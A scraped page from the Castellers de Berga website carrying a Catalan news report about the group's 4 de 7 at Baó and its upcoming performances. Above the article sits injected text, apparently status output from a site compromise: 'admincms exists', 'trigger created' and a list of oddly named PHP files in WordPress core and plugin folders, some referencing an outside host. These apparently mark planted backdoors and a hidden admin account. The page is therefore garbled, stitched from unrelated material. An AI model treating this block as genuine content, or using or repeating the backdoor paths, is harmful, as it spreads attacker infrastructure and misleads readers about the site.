Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?private https://castellersdeberga.cat/wp-admin/load-styles-wp-core.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/media-upload-core.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/ajax-actions-wp-core-meta-stream-ajax.php https://castellersdeberga.cat/wp-content/plugins/google-calendar-events/uninstall-ajax-response-wp-wp-core.php https://castellersdeberga.cat/wp-content/plugins/woo-redsys-gateway-light/about-redsys-private-ajax-response-private-ajax-stream-meta-stream-wp-stream-ajax-response-private.php https://castellersdeberga.cat/wp-includes/customize/class-wp-customize-nav-menu-section-core-private-meta-meta.php https://castellersdeberga.cat/wp-includes/IXR/class-IXR-base64-ajax-wp-ajax.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | El 4 de 7 a la Catalunya Nord
 

El 4 de 7 a la Catalunya Nord


El 4 de 7 a la Catalunya NordEls Castellers de Berga van descarregar el 4 de 7 a Baó, a la Catalunya Nord. El cap de setmana va començar dissabte al matí visitant la Festa de la Cirera, a Ceret. A la tarda, els berguedans arribaven a Baó, just al costat de Perpinyà, on participaven al Festival Identi’Cat. A la Plaça de l’Església també hi havia la colla local, els Castellers del Riberal, i els Castellers de Rubí. Els Castellers de Berga van descarregar 2 pilar de 4, el 4 de 6 amb agulla, el 4 de 7, el 3 de 6 amb agulla i dos pilars de 4. Els del Riberal van completar la seva millor actuació d’aquesta temporada descarregant 3 castells de la gamma alta de 6, més el pilar de 5. La festa va continuar al local dels Castellers del Riberal amb un sopar, concert dels alcoians El Diluvi , correfoc i concert de La Troba Kung-fú.
L’endemà al matí, cercavila amb gegants, bastoners i sardanes i una paella valenciana per tancar el cap de setmana. També van ser a Baó els bastoners berguedans Cop de Garrot.
L’activitat dels Castellers de Berga és molt intensa aquestes setmanes. Diumenge 8 de juny actuen a Puig-reig, juntament amb Salats de Súria i Torraires de Montblanc. L’actuació està emmarcarda dins la Festa Major de Puig-reig i dins la campanya d’Òmnium “Catalans want to vote” on s’alçaran castells per tota Europa. El diumenge 15 de juny arriba una de les actuacions més especials de la temporada: la Diada dels Quatre Fuets. El diumenge previ a Patum, la Plaça de Sant Pere acull la diada castellera amb Castellers de Vilafranca, Castellers de Barcelona i Castellers de Berga.